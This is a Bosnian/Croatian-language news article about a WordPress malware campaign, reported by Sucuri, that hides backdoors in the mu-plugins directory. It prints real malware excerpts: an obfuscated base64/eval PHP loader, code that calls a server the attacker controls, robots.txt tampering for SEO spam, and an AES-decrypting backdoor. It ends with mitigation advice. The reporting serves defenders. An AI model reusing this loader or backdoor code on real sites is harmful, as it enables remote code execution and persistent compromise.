Istraživači sigurnosti u Sucuri-ju nedavno su otkrili sofisticiranu kampanju malicioznog softvera, ciljajući WordPress web stranice kroz skriveni maliciozni softver i backdoor u direktoriju mu-plugins.
Ovaj lanac napada omogućava daljinsko izvršavanje malicioznog koda, omogućavajući potpuni kompromis servera, krađu podataka i stalnu kontrolu nad zaraženim lokacijama.
Direktorij /wp-content/mu-plugins/ – dizajniran za dodatke koji se moraju koristiti i koji se automatski učitavaju – postao je vektor napada. Hakeri su postavili datoteku pod nazivom index.php koja sadrži zamagljeni PHP kod:
<?php
$a = 'ba'.'se' . '64_de'.'co'.'de';
$get_file = $a('ZmlsZV9nZXRfY29udGVudHM=', true);
$wp_get_content = $get_file($_SERVER['DOCUMENT_ROOT'].'/'.call_user_func($a,'d3AtY29udGVudC91cGxvYWRzLzIwMjQvMTIvaW5kZXgudHh0'));
$final = $a($wp_get_content, true);
eval('?>'.$final);
?>Kada se dekodira, ovo preuzima i izvršava korisne podatke iz /wp-content/uploads/2024/12/index.txt .
Osim toga, sigurnosni analitičari u Sucuri-u su primijetili da nosivost druge faze sadrži napredne karakteristike: –
- Server Communication
$xmlname = urldecode('162-er103-1.ivyrebl.fvgr');
$http = is_https() ? 'https' : 'http';
$web = $http.'://'.$goweb.'/index.php?web='.$host.'&zz='.(disbot() ? '1' : '0');Maskira komunikaciju sa serverima pod kontrolom napadača dok provjerava sigurnosne alate.
- Robots.txt Manipulation
$robotsPath = $_SERVER['DOCUMENT_ROOT'].'/robots.txt';
if (!file_exists($robotsPath)) {
file_put_contents($robotsPath, "User-agent: *\nAllow: /\nSitemap: ...");
}Kreira lažne mape sajta za jačanje zlonamernih SEO kampanja .
Napredni mehanizmi postojanosti
Drugi backdoor (test-muplugin.php) koristi AES-128-CBC enkripciju za isporuku korisnog tereta:-
$_7a5b = "l2UDM/1kihg+Pd50dO3hKCkDZKCBzafIvVT20a6iA3JU8Hmvdc+zphRj...";
function zwxyb($_7a5b, $_11f9) {
return openssl_decrypt($_7a5b, 'AES-128-CBC', substr(hash('sha256', $_11f9, true), 0, 16), 0, ...);
}Ovo dešifruje komande napadača dok izbjegava detekciju zasnovanu na potpisu.
Novootkrivena kampanja malicioznog softvera kompromituje WordPress web stranice putem punjenja kredencijala i phishing napada, što dovodi do backdoor instalacija u direktoriju mu-plugins sa šifrovanim sadržajem.
Kada uđe unutra, maliciozni softver se širi bočno između servera, izvršavajući prijetnje kao što su kriptomineri, ransomware ili eksfiltracija podataka.
Da bi umanjili ovaj rizik, vlasnici web stranica treba da nametnu praćenje integriteta datoteka blokiranjem PHP izvršavanja u direktorijima za otpremanje, resetuju sve akreditive administratora, FTP-a i baze podataka i implementiraju firewall web aplikacije sa praćenjem dodataka.
Izvor: CyberSecurityNews
